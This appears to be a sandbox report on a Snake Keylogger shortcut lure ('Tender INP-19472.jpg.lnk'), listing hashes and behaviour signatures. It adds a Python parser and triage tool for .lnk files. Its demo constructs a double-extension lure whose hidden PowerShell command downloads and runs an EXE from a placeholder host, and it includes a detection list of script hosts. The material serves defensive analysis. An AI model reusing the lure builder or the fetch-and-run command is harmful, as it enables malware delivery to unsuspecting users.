General
Target: Tender INP-19472.jpg.lnk (a Windows shortcut with a double extension, presented to the recipient as a JPEG image)
Size: 2KB
Sample: 240131-mwnq1sccdn
MD5: c5b1207624c215d286c55e9c26b076a4
SHA1: 511d995a0de5291d3da99232e9789d400c80a46d
SHA256: e2b2dd05d9052c5af5d376482346ceb7d01654fd395344ae59533a761c792749
SHA512: 9a68741221022247f034a1104fe1f70d62e6e0e58ac6039dc992c689a1954721f778cb02e0eb7106f4de238619655c0accb5f4fa11a82efcb73d0b437fa3562a
Static task: static1
Behavioral task: behavioral1 (sample: Tender INP-19472.jpg.lnk; resource: win7-20231129-en)
Behavioral task: behavioral2 (sample: Tender INP-19472.jpg.lnk; resource: win10v2004-20231215-en)
Malware Config
Targets
Target: Tender INP-19472.jpg.lnk (2KB; MD5, SHA1, SHA256 and SHA512 as listed under General above)
Score: 10/10
Signatures:
- Snake Keylogger payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP address.
- Suspicious use of SetThreadContext
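The target is a 2KB shortcut named to look like a JPEG, and the signatures above (download of a PE file, execution of the dropped EXE) are what a shortcut lure typically chains into. The report does not show the shortcut's command line, so the following is an added, generic example rather than the sample's own content: it parses the ShellLinkHeader and StringData sections of a .lnk file as laid out in MS-SHLLINK and applies the triage heuristics an analyst would check first (double extension, script-host target, minimised/hidden window, embedded URL, icon borrowed from another binary). The shortcut bytes and the lure name `Invoice.jpg.lnk` are constructed inline for the demonstration and point at a reserved `.invalid` domain; they are not the bytes of the analysed file.

```python
"""Parse a Windows shortcut (.lnk, MS-SHLLINK) and score it as a lure.

Added example for this report, not code from the sandbox or the sample.
The shortcut built below is constructed here and is NOT the analysed file.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7
# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))
LOLBINS = re.compile(r"^(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|"
                     r"regsvr32|certutil|bitsadmin|curl)(\.exe)?$", re.I)


def build_lnk(show_command=SW_SHOWMINNOACTIVE, **strings):
    """Emit a minimal ShellLink: the 76-byte header plus Unicode StringData."""
    flags = IS_UNICODE
    for key, bit in STRING_FIELDS:
        if strings.get(key):
            flags |= bit
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for key, bit in STRING_FIELDS:
        if flags & bit:
            enc = strings[key].encode("utf-16-le")
            body += struct.pack("<H", len(enc) // 2) + enc  # CountCharacters + chars
    return header + body


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDList: IDListSize + items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo: LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags, "show_command": show}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            out[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            out[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return out


def is_lnk(data):
    try:
        parse_lnk(data)
        return True
    except ValueError:
        return False


def triage(filename, lnk):
    """Heuristics a sandbox or mail gateway would raise on a shortcut lure."""
    findings = []
    if re.search(r"\.(jpe?g|png|gif|pdf|docx?|xlsx?|txt)\.lnk$", filename, re.I):
        findings.append("double extension: shortcut posing as a document/image")
    target = (lnk.get("relative_path") or "").replace("\\", "/").rsplit("/", 1)[-1]
    if LOLBINS.match(target):
        findings.append(f"target is a script host or LOLBin: {target}")
    args = lnk.get("arguments", "")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE keeps the console out of sight")
    if re.search(r"-w(indowstyle)?\s+h(idden)?\b", args, re.I):
        findings.append("PowerShell -WindowStyle Hidden")
    if re.search(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", args, re.I):
        findings.append("base64-encoded command")
    urls = re.findall(r"https?://[^\s'\"]+", args)
    for url in urls:
        findings.append(f"remote download: {url}")
    if urls and re.search(r"\.exe\b", args, re.I):
        findings.append("downloads a PE file and executes it")
    icon = (lnk.get("icon_location") or "").replace("\\", "/").rsplit("/", 1)[-1]
    if icon and LOLBINS.match(target) and not LOLBINS.match(icon):
        findings.append(f"icon borrowed from another file to disguise the target: {icon}")
    return findings


# Constructed lure in the same double-extension style as the report's target;
# the command line is illustrative and points at a reserved domain.
SAMPLE_NAME = "Invoice.jpg.lnk"
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments='-w hidden -nop -c "iwr http://stage.example.invalid/a.exe '
              '-OutFile $env:TEMP\\a.exe; & $env:TEMP\\a.exe"',
    icon_location="%SystemRoot%\\System32\\imageres.dll",
)

if __name__ == "__main__":
    meta = parse_lnk(SAMPLE_LNK)
    print(f"{SAMPLE_NAME}: {len(SAMPLE_LNK)} bytes")
    for key in ("relative_path", "arguments", "icon_location"):
        print(f"  {key}: {meta.get(key)}")
    for finding in triage(SAMPLE_NAME, meta):
        print("  !", finding)
```

On a real file, read the bytes with `open(path, "rb").read()` and pass them to `parse_lnk`; shortcuts that carry a LinkTargetIDList or LinkInfo block are skipped over correctly because both sections are length-prefixed. The parser deliberately stops at StringData and ignores the trailing ExtraData blocks, which is enough to recover the launch command that the sandbox would have executed.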